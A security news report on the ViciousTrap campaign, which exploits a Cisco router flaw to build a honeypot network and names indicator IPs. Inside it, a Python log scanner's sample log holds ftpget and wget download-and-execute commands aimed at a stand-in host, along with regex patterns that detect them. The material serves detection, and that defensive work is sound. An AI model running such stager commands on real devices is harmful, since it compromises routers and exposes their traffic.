ViciousTrap Exploits Cisco Vulnerability to Establish Global Honeypot Network Comprised of 5,300 Compromised Devices


Cybersecurity researchers have revealed that a threat actor, identified as ViciousTrap, has successfully compromised approximately 5,300 unique network edge devices across 84 countries, transforming them into a honeypot-like network.

The primary method of exploitation involves a critical security vulnerability impacting several models of Cisco Small Business routers, specifically the RV016, RV042, RV042G, RV082, RV320, and RV325 (CVE-2023-20118). Notably, the majority of these infected devices are based in Macau, totaling around 850 devices.

The infection mechanism utilizes a shell script known as NetGhost, which redirects incoming traffic from specific ports of the compromised routers to infrastructure controlled by the attacker, enabling the interception of network traffic, as detailed by Sekoia in a comprehensive analysis.

It is important to note that CVE-2023-20118 had previously been exploited by another botnet referred to as PolarEdge. Although no established connection between ViciousTrap and PolarEdge has been found, it is believed that ViciousTrap is building honeypot infrastructure by compromising a diverse range of internet-facing devices, such as SOHO routers, SSL VPNs, DVRs, and BMC controllers, from over 50 brands including Araknis Networks, ASUS, D-Link, Linksys, and QNAP.

The exploitation chain involves the weaponization of CVE-2023-20118 to download and execute a bash script via ftpget, which subsequently contacts an external server to retrieve the wget binary. The Cisco vulnerability is then exploited a second time to execute a second script, this one retrieved with the previously dropped wget binary.

The second-stage shell script, dubbed NetGhost, is designed to redirect the network traffic from the compromised systems to third-party infrastructure controlled by the attacker, facilitating adversary-in-the-middle (AitM) attacks. Additionally, NetGhost has self-deletion capabilities to obscure its presence on the compromised host.

All exploitation attempts have been traced back to a single IP address (101.99.91[.]151), with documented activity beginning as early as March 2025. Within a month, the ViciousTrap actors had appropriated an undocumented web shell previously utilized in PolarEdge operations for their own activities.

Recent exploitation attempts have also targeted ASUS routers, originating from a different IP address (101.99.91[.]239). However, in these cases, the threat actors have not established honeypot infrastructure on the compromised devices. All active IP addresses in this campaign are located in Malaysia, corresponding to an Autonomous System (AS45839) managed by hosting provider Shinjiru.
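As an added defensive illustration (not code from Sekoia's analysis or from this article), the following Python script refangs the two indicator IPs quoted above and scans router log lines for either of them, or for the download-then-execute stager pattern described in the exploitation chain (ftpget or wget writing a file under /tmp that a shell then executes). The syslog-style log format, the hostnames, and the 203.0.113.5 download server are constructed assumptions.

```python
import re

# Indicators quoted in the article, kept in their defanged form.
DEFANGED_IOCS = ["101.99.91[.]151", "101.99.91[.]239"]

# Constructed sample lines in an assumed syslog-style format; not real telemetry.
# 203.0.113.5 is a documentation (TEST-NET-3) address standing in for a download server.
SAMPLE_LOG = """\
2025-03-14T02:11:07Z rv042 httpd src=101.99.91.151 path=/admin status=200
2025-03-14T02:11:09Z rv042 sh cmd="ftpget -u ftp -p ftp 203.0.113.5 /tmp/a.sh a.sh; sh /tmp/a.sh"
2025-03-14T02:15:30Z rv042 httpd src=198.51.100.7 path=/index.html status=200
2025-04-02T11:40:12Z asus-rt sh cmd="/tmp/wget http://203.0.113.5/s2.sh -O /tmp/s2.sh; sh /tmp/s2.sh"
2025-04-02T11:41:00Z asus-rt httpd src=101.99.91.239 path=/admin status=401
"""

SRC_RE = re.compile(r"\bsrc=(\d{1,3}(?:\.\d{1,3}){3})\b")
CMD_RE = re.compile(r'\bcmd="([^"]*)"')
# A fetch tool writing into a temp path, and a shell later executing that same path.
FETCH_RE = re.compile(r"\b(?:ftpget|wget)\b[^;|&]*?(/tmp/[^\s;|&]+)")
EXEC_RE = re.compile(r"\b(?:sh|bash)\s+(/tmp/[^\s;|&]+)")


def refang(ioc: str) -> str:
    """Turn a defanged indicator such as 101.99.91[.]151 back into a plain IP string."""
    return ioc.replace("[.]", ".")


IOC_IPS = {refang(i) for i in DEFANGED_IOCS}


def scan_log(text: str) -> list[tuple[int, str]]:
    """Return (line_number, reason) for each line matching an indicator or the stager pattern."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = SRC_RE.search(line)
        if m and m.group(1) in IOC_IPS:
            hits.append((n, f"source {m.group(1)} is an exploitation source IP reported for ViciousTrap"))
            continue
        c = CMD_RE.search(line)
        if c:
            # Only flag when the fetched file is the same path that is then executed.
            staged = set(FETCH_RE.findall(c.group(1))) & set(EXEC_RE.findall(c.group(1)))
            if staged:
                hits.append((n, "download-then-execute stager: " + ", ".join(sorted(staged))))
    return hits


if __name__ == "__main__":
    for n, reason in scan_log(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```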

The threat actor is suspected to be of Chinese-speaking origin, indicated by some overlapping characteristics with the GobRAT infrastructure, as well as the redirection of traffic to several assets in Taiwan and the United States.

The ultimate objective of ViciousTrap remains unclear, although it is assessed with a high degree of confidence that the operation is indeed aimed at establishing a honeypot-style network.